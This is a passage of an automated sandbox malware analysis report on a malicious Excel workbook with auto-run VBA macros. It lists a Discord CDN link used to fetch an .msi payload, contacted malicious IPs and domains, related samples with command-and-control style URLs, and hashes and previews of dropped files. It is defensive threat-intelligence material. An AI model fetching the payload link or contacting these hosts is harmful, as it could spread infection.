                                            https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnGmsiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmpfalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              192.0.78.25
                                              adimadimingilizce.comUnited States
                                              2635AUTOMATTICUStrue
                                              99.83.154.118
                                              www.destek-taleplerimiz.comUnited States
                                              16509AMAZON-02UStrue

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:402839
                                              Start date:03.05.2021
                                              Start time:14:40:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:0d69e4f6_by_Libranalysis (renamed file extension from none to xls)
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLS@12/4@6/2
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 33% (good quality ratio 31.6%)
                                              • Quality average: 75.6%
                                              • Quality standard deviation: 25.5%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Changed system and user locale, location and keyboard layout to English - United States
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              14:40:39API Interceptor63x Sleep call for process: msiexec.exe modified
                                              14:40:44API Interceptor117x Sleep call for process: MSID8B1.tmp modified
                                              14:41:10API Interceptor229x Sleep call for process: wininit.exe modified
                                              14:41:43API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              192.0.78.25wMqdemYyHm.exeGet hashmaliciousBrowse
                                              • www.mariacolom.net/f0sg/?7n0lqHm=AymEOqKXV1chl8iQYgJ3uquKzbaTRejMwBVZPwqkc2a5oMJioVLywtrs+1kTDlzhFYWt&CP=chrxU
                                              MSUtbPjUGib2dvd.exeGet hashmaliciousBrowse
                                              • www.theeconomicalmillennial.com/ffy/?-Z1hnrG=LKzXTzQzAW62bakJWBTKGsXtco2vSeK+LB7ryfsB0EObM+MwqUwTrLh5ElP1zwE4uPh9&2d0=lnxdA
                                              PROFORMA INVOICE-INV393456434.pdf.exeGet hashmaliciousBrowse
                                              • www.exafeprods.com/sbqi/?QPdT=wlXNghr8E5DBrABF7PUJ5OZBbAz3HWA6A4d9F/DKLZM4PCK20Ia3HOsX74YqnMTWqQvc&nzrT8h=5jRDMLpHNB
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • www.thevillaflora.com/hw6d/?rVEt3p=S0D0v04&SPx=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHweU92bftmwluo5xg==
                                              ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                              • www.edithblanco.com/b3gc/?ARn=vYB5T5iqfyqejgEQl1l0Dj2yWCwTz0bR5VrqFwdqJE7Zyc+/6nKJEet/ZYp7lBTYqLXP&ndkHzH=-Z20XnRx36xD
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • www.helmutbuntjer.com/o86d/?Yn=f4CIh52BCvuV4AgMKYBtNzllunOhcH1VRANY9wSd3mBWXFy5KGoMvsJ/sINxatlNXpAr&RR=Y4ClpHwHA4lh6FF
                                              Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                              • www.avondalevotes.com/o86d/?GPTl=l7PM0no/7ZHx5mjX60jpj0VJL/9K6f55RKcqNG9asLbFj/lGQ4f0PxJ7PsdijTvnBO1aie26Zg==&BlB=O2JthfYxo
                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE
                                              order drawing 101.exeGet hashmaliciousBrowse
                                              • www.yashasvsaluja.com/ma3c/?GV_P=8pDpKpNHoZ_dLx&R2JlOJ=avNb7mifsq7rzXY8Hv21gXyNWEz5WOIpKihV+epsdLtVD9yeW0B30T6y1OCLtvf/9IHx
                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                              • www.tiffanymcolston.com/uwec/?Rl4=YVFTx4yh&GFQl9jnp=kga628dAwNTqX66vfbKck2tgviC/7qfZNTCNV9C4sYy0SIyacyre6zaFI8CRfaI5nkXs
                                              Remittance advice.exeGet hashmaliciousBrowse
                                              • www.thecurmudgeonsspeakout.com/hx3a/?Qvu=JlMpoPIhNtr&ypkhVn5X=N0FC+tc54bmf/JTH8xH+aqzgdWsf4nLwonNH3Nnbm+D+dFZXfSyDwY+xYHMjgyeY5i7A4XmUfQ==
                                              INV#609-005.PDF.exeGet hashmaliciousBrowse
                                              • www.jianavictoriaospina.com/ve9m/?vPDhx=DZP7uK4y6p96OiK9OQfW5fpj5QQuD/WNsLlhMYSSKSRyKM12FYSY3B1XGCeHwPMCGRx8&kfL8ap=F6AlIfF8e4F
                                              s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                              • www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                              g2qwgG2xbe.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?Ezut_6Ph=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&lhuLO=TxllZ2B
                                              12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                              • www.thevillaflora.com/hw6d/?NTxxLxi=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHwnLMWYR763luo+iQ==&Cj9LK=9rjlL0C
                                              Customer-100912288113.xlsxGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?YPxxw=JxlLiTVHLV_&4h=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                              vbc.exeGet hashmaliciousBrowse
                                              • www.regalparkllc.com/nnmd/?VRNp=wBZl4vkh1&MvdD=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK
                                              RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                              • www.619savage.store/uwec/?CZ6=7nExZbW&v2=UXtrAnkUbxIt7Da+co89vc/yvelnirGGdixyijtvmiG0dXcVjZHX+cHMX+KvBOjcxYq/
                                              yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                              • www.longdoggy.net/vu9b/?OV0xlV=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZtS/Pp2iNH&wh=jL0xYFb0mbwHi
                                              g0g865fQ2S.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?4h3=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&vTapK=LJBpc8p
                                              99.83.154.118shipping document pdf.exeGet hashmaliciousBrowse
                                              • www.kcgertfarm.com/htl/?_6Ax4N=YJE87vjpATZ&QFQL4Z=Y7TDP+px4JC/SSqVeQPAJJ3lS8rxz+cXHWUOWGnTGVC5LdKUNGbP50uDVhtUgmD5Xmz46i5nLA==
                                              lBXZjiCuW0.exeGet hashmaliciousBrowse
                                              • www.mythree-informationupdates.com/njhr/?uZWx=/zO4UNfgdHCPEreRZ95iML5TdeDdCZBMXXzBOiwQzcrtbsVzRUIeP21tWMjEhMv1ee9K&9r6LE=FbYDOl6

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              cdn.discordapp.com6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              To1sRo1E8P.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              wNgiGmsOwT.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              BhTxt5BUvy.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              rSYbV3jx0K.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              04282021.DOC.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              SkKcQaHEB8.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              P20200107.DOCGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              New order.04272021.DOC.exeGet hashmaliciousBrowse
                                              • 162.159.134.233
                                              Payment-Confirmation_Copy.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              Q264003.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              Camscanner.New Order.09878766.exeGet hashmaliciousBrowse
                                              • 162.159.135.233
                                              doc07621220210416113300.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              REF # 166060421.docGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              File Attached.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                              • 162.159.130.233

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AUTOMATTICUSwMqdemYyHm.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              MSUtbPjUGib2dvd.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              PROFORMA INVOICE-INV393456434.pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              agnesng@hanglung.comOnedrive.htmlGet hashmaliciousBrowse
                                              • 192.0.77.2
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                              • 192.0.66.2
                                              Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                              • 192.0.66.2
                                              DVO100024000.docGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              order drawing 101.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                              • 192.0.78.246
                                              win32.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              regasm.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              Remittance advice.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              oEWV80rj6fgwF5i.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              AMAZON-02USd630fc19_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                              • 52.219.40.51
                                              presupuesto.xlsxGet hashmaliciousBrowse
                                              • 143.204.202.49
                                              Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                              • 3.34.241.29
                                              O1E623TjjW.exeGet hashmaliciousBrowse
                                              • 52.52.155.86
                                              file.exeGet hashmaliciousBrowse
                                              • 52.15.160.167
                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                              • 3.14.18.91
                                              80896e11_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 3.141.142.211
                                              QxnqOxC0qE.exeGet hashmaliciousBrowse
                                              • 52.14.161.64
                                              ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                              • 3.34.241.29
                                              DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                              • 99.86.2.5
                                              nT7K5GG5kmGet hashmaliciousBrowse
                                              • 35.155.184.95
                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                              • 99.83.224.11
                                              fI1YXJEuz5.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              wSBbLKrAti.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              qRTSlJsJb7.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              j3Y709Q8wv.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              QibTWFydoZ.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              J99vIX30UF.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              CMj5f279cs.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              Nkef9ryisT.exeGet hashmaliciousBrowse
                                              • 99.83.154.118

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\64cgbfdn23gia0
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6661
                                              Entropy (8bit):7.469743146526507
                                              Encrypted:false
                                              SSDEEP:96:ilvxI1BNLSkmzO+Q9nKNG1yUieQpH22BcxZl176Y1g7ibEyykBw2+Io3:ihxCmU2G1yDRi6D7ibEAa2+n
                                              MD5:452DCF954B6B913EF5CA0E206051C180
                                              SHA1:DC436B4BB30477ADDE34685EA17F9DBC3E051269
                                              SHA-256:3EFC04F6A63F01436C128AEEB60607FC0CC45A25463EC523ADCB801681892D07
                                              SHA-512:3442FCB88CB1766A4B541FA02B0395A4CCF942F774DB0F1420FBA0C0AA9101F594F18CDDC19AB1EC874B52AE91941A6270FDDB00B88336B19A91E066B063548B
                                              Malicious:false
                                              Reputation:low
                                              Preview: .....]..igA.Q-...B..Y....sM.V.-.S..R.9..S-.S.u.FN=..NFNZ.9R.HFV\.y.w4.B0m......N.q......>.0em....HZ.\Qy........]M.....+>4QQ6...t.Bpem ...hk6|q.....T."P.m.... Y.$Q.....4B"......(!6<..{{w.\.yD.ww0G^0qM.....M..."..Y&H?.\.9hHY..Q-F4j".E.x.="$E.~..>4Q..`NN0Qm.4FB0mMxT.b|.Yv..PqMxT..0emR...H!.\Qy.....Wb.......j>4QQ.ccw.<B.emjww{..6.q.L.....".m.... Y.$QA....4.".EM....(!6<1Y$...4bB0..V...0Y^Tqqx...+.d..z...Hj........4.ey....>.....(F.....{j.dcw~....Q-.N.._..].~#...qM.....=.3...Qm"...&........B...Mmb...r.N'..Q..e*...q^...Rr-...i.B...9.2[..I...NZ......&....{.b....Q.nFT..{].f....q......l.m..=......e-ZN.z..i.26..z>.....Qm....~.-..y-RF.=.>.....q.....y..{1...9.Q."...S......q^Or*...v+?....be...Q-"SM.sNJq.....sM.sV.Q..gM..g.....;..A._...S.8[..j.-.......oa.:o9.q.^...~..........4.zy.=...z.~OZN..nEFZZ......|wwj....2...4......=.6.....F.]6...m.I..-....y.......EM......}...b.....Q...;..h.T..Y.J.........=...>..m.I...\NZ.....l...g...j.....w.zw..R.....Y.i..^.m.... .>.
                                              C:\Users\user\AppData\Local\Temp\h5zr3pu7px
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):186368
                                              Entropy (8bit):7.999094427295739
                                              Encrypted:true
                                              SSDEEP:3072:9HeCZ6w4ulLMJZvUsLVHXWUG6gvzUJQgHVi6ODuWNHoUhrjHMeYMNZya65:xtkoCvUshHXWUG6oyRi6OTNIU1jHMeYB
                                              MD5:E5B5F2A86B12D2DFBE61D5F77763BE2A
                                              SHA1:1E7B0F696748E3966440A24B6F6393AA76AA4B3F
                                              SHA-256:4C93439D859610B909FB82A8D55C228C1523DB9BBA3D83566D3360A202C7899E
                                              SHA-512:9EA0E54DD150511B4591322A685FB325D1E8A24FBF5F619E60FBBDCB967393489FF7463E4D29641A395A602475183AF3CB37483E12CCB0733544FE38BF2A92AA
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..6%.@..]S...u...f..g@.o....D.`...6...]...s......9JL..."5 .t...8....h-[%.].VcX.m.:DI..a..w...t......I..ic.Z......B.z.(.W....VD.D.G.5..(;X[..l.>.5Z..n.bI.o....B.}V2......e..^r......?.W..pR<mGJ....,.......r....1e......u.. ..G..J..JI....w.!z?ej{...0..?.g..c...|.....Q".s...e...Y.T..rU..;..f.ye.`...<t.g.|.\_....%.."..P._...."....}B.2...>.y..mi#......B..x,...o~.'.R.D9Dwl.#.:/.c.h"..3.....e..].j..b.h.>....SGm..U/A$..w$r.....MZ..x....>....C=..vjcJ....-.B..uy.l!!.......}..+..vz....%8Ud.,`....I]L...4..~..3..9*.x...H..%........6.`.:.5]/bnL.Y6...B.su.e.0....E..........?.M.X.._.A.....,SCL..R...^1!J..v....d.....c.rN.C8...$.Y....F..P..X...,..00......-.gJ.wF:.a.O...*.V......<.b.mU..........l...]....g:o....[.f....mM#|.:.0...Q&RK.'.2.iK.....ii.v.k.:.,z..h@p....X3G53;...>./%..;EiA.C.<.gO.Y..0...`l.iK...6.+.......vs...m..0..2..*D.X.Q...Po....~.....q$.$.Y$..5..#Ps.._..z.".V.S....W.L....k*TL.....O%5@.....(...|.O_.I..g.B.w.Gp......M..[..!..$..e@.J.1.CL.9..yKV.......0+<oI...
                                              C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):4.381810561586193
                                              Encrypted:false
                                              SSDEEP:48:ai90fn1ASkT3/NDZbitP8X3V9TJ6F2YvRUq1nh/SS72+DtMYquSzieLqRuqS:/On1ASkLNDZ+tq9m20RLf2otsJzUx
                                              MD5:684720049DCA3DEFA172BF93F56012D2
                                              SHA1:C77657F31828F1683462D67C30C33DC3EF84D6D4
                                              SHA-256:658E0AC49C51AB8EEFE51A1790F9B0A43E9CF7495E66334411F53A5C7200734B
                                              SHA-512:924CD7A7E8617EB8A4E5D70EE6407F1535B11F34B6BD7228683464EDDDBE2A49FEA1DAFA2B25E7E7B16446A14E7246560E37B622B3968AD01025AA7041263F6B
                                              Malicious:true
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L.....`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text...r........................... ..`.rdata..".... ......................@..@.data...D....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\nszB83A.tmp
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):201776
                                              Entropy (8bit):7.954384945910277
                                              Encrypted:false
                                              SSDEEP:6144:v5tkoCvUshHXWUG6oyRi6OTNIU1jHMeYMDy:RPsh5XXRYTrjHdj
                                              MD5:AC93D1A09D287B234C11E01BA73D7000
                                              SHA1:C5C1E2CD3B96B6F0B38565C05CA0C40D65EB4591
                                              SHA-256:4F5A7AE7A3059308D3B5FF9EE0918B1FE215FB0EF8D00EA2A7399A4F2E14EBE1
                                              SHA-512:B8A315320555BDED845AD2AF2D7FEF6043E422AD3BFB2E42DFE071DCD2EB80638215BE8BE39EE39B5EFB325A1567DEBC377ADC804AFCA54587AC809454E6AD9B
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........,...............................5...................................................................................................................................................................................................................................................J...................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: HP, Last Saved By: HP, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon May 3 11:10:40 2021, Last Saved Time/Date: Mon May 3 11:10:40 2021, Security: 0
                                              Entropy (8bit):4.927898650848454
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:0d69e4f6_by_Libranalysis.xls
                                              File size:38912
                                              MD5:0d69e4f684735cf4f187659ee0882fd8
                                              SHA1:55a52f6971084224e3030b76cd44d13b0203b749
                                              SHA256:0c856e57da034a8943b4065297d075365090d9eb925abb7ba74dd3df9acefc1f
                                              SHA512:9bfc38689030d9100a52d192ffacf7afcf82ec64b40bb34613adaa109c1557959123ee4c261b4becaed28b99c28044cd410dc3f82fc18ab82276311e40464647
                                              SSDEEP:768:tck3hOdsylKlgryzc4bNhZFGzE+cL2knAJ0OiCgCvVKQ29CYubyfe:ik3hOdsylKlgryzc4bNhZFGzE+cL2kne
                                              File Content Preview:........................>..................................."..................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea286a4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "0d69e4f6_by_Libranalysis.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Author:HP
                                              Last Saved By:HP
                                              Create Time:2021-05-03 10:10:40
                                              Last Saved Time:2021-05-03 10:10:40
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Company:gh
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:983040

                                              Streams with VBA

                                              VBA File Name: AK2_oiMjTt8L.bas, Stream Size: 6925
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/AK2_oiMjTt8L
                                              VBA File Name:AK2_oiMjTt8L.bas
                                              Stream Size:6925
                                              Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . . . . . a . . . M . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 03 00 03 f0 00 00 00 32 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 61 05 00 00 4d 10 00 00 00 00 00 00 01 00 00 00 ba 19 41 8f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              Error
                                              Resume
                                              b___v(ds
                                              Df+Cwb_MI
                                              w.S^tV
                                              oidffgdngk
                                              hhfgghgff
                                              TisIeAagRwA
                                              AGt/<bV`|Wk
                                              String)
                                              "fdshuug
                                              nP!{/nHnBsP
                                              fdsgdfsoi
                                              Range
                                              Vywm.
                                              Chr(ds
                                              Integer)
                                              TBF[u_-Y
                                              "iosadfodsi
                                              Attribute
                                              VB_Name
                                              Function
                                              b___v
                                              ?zoFt(
                                              VBA Code
                                              VBA File Name: Sheet1.cls, Stream Size: 991
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:991
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 19 0c fb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              VBA File Name: ThisWorkbook.cls, Stream Size: 1243
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:1243
                                              Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 03 00 00 f0 00 00 00 2a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 31 03 00 00 d5 03 00 00 00 00 00 00 01 00 00 00 ba 19 c9 86 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              Private
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              workbook_open()
                                              "ThisWorkbook"
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.18482950044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
